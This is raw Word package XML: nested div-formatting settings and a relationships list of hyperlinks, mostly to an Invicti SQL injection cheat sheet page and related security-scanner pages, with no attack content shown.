                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="692807504">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="733283853">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1713656030">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1309282550">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="865485744">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1544830560">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="1620529133">
                                          <w:marLeft w:val="0"/>
                                          <w:marRight w:val="0"/>
                                          <w:marTop w:val="0"/>
                                          <w:marBottom w:val="0"/>
                                          <w:divBdr>
                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                          </w:divBdr>
                                          <w:divsChild>
                                            <w:div w:id="1738164038">
                                              <w:marLeft w:val="0"/>
                                              <w:marRight w:val="0"/>
                                              <w:marTop w:val="0"/>
                                              <w:marBottom w:val="0"/>
                                              <w:divBdr>
                                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                              </w:divBdr>
                                              <w:divsChild>
                                                <w:div w:id="213366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40616">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                    <w:div w:id="1813250774">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                    <w:div w:id="899823368">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="1232353153">
                                          <w:marLeft w:val="0"/>
                                          <w:marRight w:val="0"/>
                                          <w:marTop w:val="0"/>
                                          <w:marBottom w:val="0"/>
                                          <w:divBdr>
                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                          </w:divBdr>
                                        </w:div>
                                        <w:div w:id="157820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868922">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                          </w:divsChild>
                        </w:div>
                        <w:div w:id="178908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625869">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2031878848">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="805854227">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1849907808">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="422728509">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1769809133">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1989355999">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="2127499869">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="1123187587">
                                          <w:blockQuote w:val="1"/>
                                          <w:marLeft w:val="720"/>
                                          <w:marRight w:val="720"/>
                                          <w:marTop w:val="100"/>
                                          <w:marBottom w:val="100"/>
                                          <w:divBdr>
                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:left w:val="single" w:sz="24" w:space="0" w:color="CC8BDB"/>
                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                          </w:divBdr>
                                        </w:div>
                                        <w:div w:id="1387292397">
                                          <w:blockQuote w:val="1"/>
                                          <w:marLeft w:val="720"/>
                                          <w:marRight w:val="720"/>
                                          <w:marTop w:val="100"/>
                                          <w:marBottom w:val="100"/>
                                          <w:divBdr>
                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:left w:val="single" w:sz="24" w:space="0" w:color="CC8BDB"/>
                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                          </w:divBdr>
                                        </w:div>
                                        <w:div w:id="1729916745">
                                          <w:blockQuote w:val="1"/>
                                          <w:marLeft w:val="720"/>
                                          <w:marRight w:val="720"/>
                                          <w:marTop w:val="100"/>
                                          <w:marBottom w:val="100"/>
                                          <w:divBdr>
                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:left w:val="single" w:sz="24" w:space="0" w:color="CC8BDB"/>
                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                          </w:divBdr>
                                        </w:div>
                                        <w:div w:id="941448455">
                                          <w:blockQuote w:val="1"/>
                                          <w:marLeft w:val="720"/>
                                          <w:marRight w:val="720"/>
                                          <w:marTop w:val="100"/>
                                          <w:marBottom w:val="100"/>
                                          <w:divBdr>
                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:left w:val="single" w:sz="24" w:space="0" w:color="CC8BDB"/>
                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                          </w:divBdr>
                                        </w:div>
                                      </w:divsChild>
                                    </w:div>
                                    <w:div w:id="1840074914">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="1420297025">
                                          <w:marLeft w:val="0"/>
                                          <w:marRight w:val="0"/>
                                          <w:marTop w:val="0"/>
                                          <w:marBottom w:val="0"/>
                                          <w:divBdr>
                                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                          </w:divBdr>
                                          <w:divsChild>
                                            <w:div w:id="130758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victi.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.invicti.com/learn/out-of-band-sql-injection-oob-sqli/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.invicti.com/get-demo/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/author/ferruh-mavituna" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.invicti.com/learn/dynamic-application-security-testing-dast/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn2.microsoft.com/en-us/library/ms190312.aspx"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www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.invicti.com/clp/proof-based-scanning-whitepaper/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.invicti.com/learn/sql-injection-sqli/" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" 